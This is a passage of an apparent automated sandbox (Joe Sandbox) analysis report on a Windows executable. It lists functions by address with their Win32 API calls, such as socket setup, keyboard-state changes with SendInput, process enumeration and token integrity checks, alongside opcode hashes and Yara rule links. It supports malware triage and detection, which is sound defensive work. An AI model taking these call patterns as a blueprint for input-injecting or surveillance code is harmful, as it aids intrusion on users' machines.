                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$AllocClearCopyInitString
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2808897238-0
                                                                                                                            • Opcode ID: 85d07d37b049ae08e1aa6079024874d98f70932dacff47c68a0eb1cae0787698
                                                                                                                            • Instruction ID: 8c68bf869c1b7e975be7e1bd9227dc98b9ece1451594eed208d7d0a519fcf404
                                                                                                                            • Opcode Fuzzy Hash: 85d07d37b049ae08e1aa6079024874d98f70932dacff47c68a0eb1cae0787698
                                                                                                                            • Instruction Fuzzy Hash: 9051B075600305AADF24EF65D895B2AF3E5AF45330F20D81FE596EB292DF78D841A700
                                                                                                                            Function 00F697F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetWindowRect.USER32(0120DB78,?), ref: 00F69863
                                                                                                                            • ScreenToClient.USER32(00000002,00000002), ref: 00F69896
                                                                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F69903
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3880355969-0
                                                                                                                            • Opcode ID: ffaf1b98355ca1939c8eea78a8dc382dca87ba6e10710c13ec3bf97647661b69
                                                                                                                            • Instruction ID: a768c3894fcac7fcb3d660e65e6b8aba6c123ea9c9b9820c8e729f4873857935
                                                                                                                            • Opcode Fuzzy Hash: ffaf1b98355ca1939c8eea78a8dc382dca87ba6e10710c13ec3bf97647661b69
                                                                                                                            • Instruction Fuzzy Hash: 90515E74A04209EFDF10CF24D880AAE7BB9FF46770F548159F8659B2A0D771AD41EB90
                                                                                                                            Function 00F39A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00F39AD2
                                                                                                                            • __itow.LIBCMT ref: 00F39B03
                                                                                                                              • Part of subcall function 00F39D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00F39DBE
                                                                                                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00F39B6C
                                                                                                                            • __itow.LIBCMT ref: 00F39BC3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$__itow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3379773720-0
                                                                                                                            • Opcode ID: a8634ff54283459df8c08fe7f72d7550585515b8b57d9f87667bbf446b732cc6
                                                                                                                            • Instruction ID: 1d336f8b1463ed9f20085d9ed2822b7147ef934717a53a9fbf4055c971945819
                                                                                                                            • Opcode Fuzzy Hash: a8634ff54283459df8c08fe7f72d7550585515b8b57d9f87667bbf446b732cc6
                                                                                                                            • Instruction Fuzzy Hash: 1541BF70A0434CABDF11EF51D846BEEBBB9EF88720F000029F945A7291DBB09A44DB61
                                                                                                                            Function 00F569AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00F569D1
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00F569E1
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
                                                                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F56A45
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00F56A51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2214342067-0
                                                                                                                            • Opcode ID: c290a1d555e8d4ae82d38f198ae2e630c5792fb92d7afe6712d5a38e2b1e2a2e
                                                                                                                            • Instruction ID: a43003e12fabd9823d2a7a273f5ac8d511a99e3d0cba001e306e5358160af231
                                                                                                                            • Opcode Fuzzy Hash: c290a1d555e8d4ae82d38f198ae2e630c5792fb92d7afe6712d5a38e2b1e2a2e
                                                                                                                            • Instruction Fuzzy Hash: D441B4757402086FEB60AF25DC86F3977E89F04B14F448168FA69EF2D3DAB49D009791
                                                                                                                            Function 00F5641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00F6F910), ref: 00F564A7
                                                                                                                            • _strlen.LIBCMT ref: 00F564D9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _strlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4218353326-0
                                                                                                                            • Opcode ID: 169dd6cfdccc9171bad5205aa271a802228a2795374260e7631671eb40dba270
                                                                                                                            • Instruction ID: a04fed7e1f2661d50915ded7794f71bd43f4ff10dbd5f1da971fdad232265e06
                                                                                                                            • Opcode Fuzzy Hash: 169dd6cfdccc9171bad5205aa271a802228a2795374260e7631671eb40dba270
                                                                                                                            • Instruction Fuzzy Hash: AF41E831900108AFCB14EB65EC85FAEB7F8AF14310F548165FE29E7292EB30AD04E750
                                                                                                                            Function 00F4B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F4B89E
                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00F4B8C4
                                                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F4B8E9
                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F4B915
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3321077145-0
                                                                                                                            • Opcode ID: 258f643fbd7ba05914fd91ef2fbdaf4b89f65e1de8cdcaccfaf39363eb8b02b7
                                                                                                                            • Instruction ID: 91f4f0455667de6236a4ba3c0ddf95457c8f1010f622a7f1dabe3fe88d223945
                                                                                                                            • Opcode Fuzzy Hash: 258f643fbd7ba05914fd91ef2fbdaf4b89f65e1de8cdcaccfaf39363eb8b02b7
                                                                                                                            • Instruction Fuzzy Hash: 2E412A39A00654DFCB14EF15C485A59BBE1EF8A320F098098ED4AAB362CB34FD01DB95
                                                                                                                            Function 00F68851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F688DE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InvalidateRect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 634782764-0
                                                                                                                            • Opcode ID: f405f554c68cde10d727aed4f24697b8093f84c360f90628b68e4c1a4ee253a3
                                                                                                                            • Instruction ID: 14e9fd4a6966045a9e4456a431e0a44488f3104bb5183ea5b31b2c204acdfc5f
                                                                                                                            • Opcode Fuzzy Hash: f405f554c68cde10d727aed4f24697b8093f84c360f90628b68e4c1a4ee253a3
                                                                                                                            • Instruction Fuzzy Hash: EF310630A40108AFEF209A28DC45FBC37A4EB067A0F54461AFA11E71E1CE70DD42B752
                                                                                                                            Function 00F6AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ClientToScreen.USER32(?,?), ref: 00F6AB60
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00F6ABD6
                                                                                                                            • PtInRect.USER32(?,?,00F6C014), ref: 00F6ABE6
                                                                                                                            • MessageBeep.USER32(00000000), ref: 00F6AC57
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1352109105-0
                                                                                                                            • Opcode ID: afa88980d26d427df085e0e6be7cfbff426e1e911ff17b137ea96fda1852a30e
                                                                                                                            • Instruction ID: 477905446594544f034301d09f6c76634451c0a0ddc63a2d9477dc820d9bc4b7
                                                                                                                            • Opcode Fuzzy Hash: afa88980d26d427df085e0e6be7cfbff426e1e911ff17b137ea96fda1852a30e
                                                                                                                            • Instruction Fuzzy Hash: C7417C70A00219DFCB11DF58D884BA97BF5FF49720F1881A9E825AB365D730E841EF92
                                                                                                                            Function 00F40AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F40B27
                                                                                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00F40B43
                                                                                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00F40BA9
                                                                                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00F40BFB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 432972143-0
                                                                                                                            • Opcode ID: 807f47c9d6d87591acb26c2073b52ba3510ec3315d17981b1b157a46cf4b5a06
                                                                                                                            • Instruction ID: b5c3463e28c3e00814fc1074d4bfcccd4cdf09d405b6cad217c1a09c8dcd5050
                                                                                                                            • Opcode Fuzzy Hash: 807f47c9d6d87591acb26c2073b52ba3510ec3315d17981b1b157a46cf4b5a06
                                                                                                                            • Instruction Fuzzy Hash: 6D310B30D44218AEFB308A658C05BF9BF65EBC5334F08425AEE91D21D1CBB94D45B759
                                                                                                                            Function 00F40C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00F40C66
                                                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F40C82
                                                                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F40CE1
                                                                                                                            • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00F40D33
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 432972143-0
                                                                                                                            • Opcode ID: 9a1b24b69e33a4ce32ce7e7a732d261c2d448cdfc893ea37cb076871a6b67e2a
                                                                                                                            • Instruction ID: 75c3ecddb76ff5bfbe1e92b7722281d9027ea5042214c652d3148bf8807b9b1c
                                                                                                                            • Opcode Fuzzy Hash: 9a1b24b69e33a4ce32ce7e7a732d261c2d448cdfc893ea37cb076871a6b67e2a
                                                                                                                            • Instruction Fuzzy Hash: 7A310630E40218AEFB208B659C047BEBF75AB45334F08431AEA95621D1CB799D49B791
                                                                                                                            Function 00F161C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F161FB
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 00F16229
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F16257
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F1628D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            • Opcode ID: 768c531c8b0a2ac441eb5631365776a3c07969b8ec396791c710ec61c61181dc
                                                                                                                            • Instruction ID: f268c28b46a2c5f7e0f21da2450de426d9c39efdf62a846911d5e568313ffefe
                                                                                                                            • Opcode Fuzzy Hash: 768c531c8b0a2ac441eb5631365776a3c07969b8ec396791c710ec61c61181dc
                                                                                                                            • Instruction Fuzzy Hash: F031AE31A04286AFDF228F65CC44BFA7BA9BF42760F154029E864D71A1E731D990FB90
                                                                                                                            Function 00F64EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetForegroundWindow.USER32 ref: 00F64F02
                                                                                                                              • Part of subcall function 00F43641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F4365B
                                                                                                                              • Part of subcall function 00F43641: GetCurrentThreadId.KERNEL32 ref: 00F43662
                                                                                                                              • Part of subcall function 00F43641: AttachThreadInput.USER32(00000000,?,00F45005), ref: 00F43669
                                                                                                                            • GetCaretPos.USER32(?), ref: 00F64F13
                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00F64F4E
                                                                                                                            • GetForegroundWindow.USER32 ref: 00F64F54
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2759813231-0
                                                                                                                            • Opcode ID: 6a6efd7b0ffeebf07d955c3082b365f33d3a19c47e60c3c7904a0de4f63ea18d
                                                                                                                            • Instruction ID: 55b62b94239af4492d09fdf2d6f64c96f03520dab9f1c59cefe43012d41cc691
                                                                                                                            • Opcode Fuzzy Hash: 6a6efd7b0ffeebf07d955c3082b365f33d3a19c47e60c3c7904a0de4f63ea18d
                                                                                                                            • Instruction Fuzzy Hash: 113130B1D00108AFCB00EFA6CD85DEFB7F9EF98300F10406AE415E7211DA759E458BA1
                                                                                                                            Function 00F43C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00F43C7A
                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00F43C88
                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00F43CA8
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F43D52
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 420147892-0
                                                                                                                            • Opcode ID: 21745a22b63de72ef6268814fb634ae1a1908e9b4ad9e1e0656166f197180067
                                                                                                                            • Instruction ID: 466ea5d770475512ce18721396665ab93b012175637f082d30b5db13f7895534
                                                                                                                            • Opcode Fuzzy Hash: 21745a22b63de72ef6268814fb634ae1a1908e9b4ad9e1e0656166f197180067
                                                                                                                            • Instruction Fuzzy Hash: 2E31E3715083499FD300EF51D881ABFBBF8EF95354F40082CF892961A1EB719E49DB92
                                                                                                                            Function 00F6C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE2612: GetWindowLongW.USER32(?,000000EB), ref: 00EE2623
                                                                                                                            • GetCursorPos.USER32(?), ref: 00F6C4D2
                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F1B9AB,?,?,?,?,?), ref: 00F6C4E7
                                                                                                                            • GetCursorPos.USER32(?), ref: 00F6C534
                                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F1B9AB,?,?,?), ref: 00F6C56E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2864067406-0
                                                                                                                            • Opcode ID: babc8a47f7f024e1155febbb5634783b926287327c7664dc9bc7432db8d6ce13
                                                                                                                            • Instruction ID: 914a40c9c96b6c05e15fdd8fb582aaebe67a05090aec1bacf739a2e5944e43a8
                                                                                                                            • Opcode Fuzzy Hash: babc8a47f7f024e1155febbb5634783b926287327c7664dc9bc7432db8d6ce13
                                                                                                                            • Instruction Fuzzy Hash: 7A31D535500158AFCB15CF58CC58EFA7BB9EB0A720F484069F9868B261C731AD50EBE4
                                                                                                                            Function 00F38656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F3810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F38121
                                                                                                                              • Part of subcall function 00F3810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F3812B
                                                                                                                              • Part of subcall function 00F3810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F3813A
                                                                                                                              • Part of subcall function 00F3810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F38141
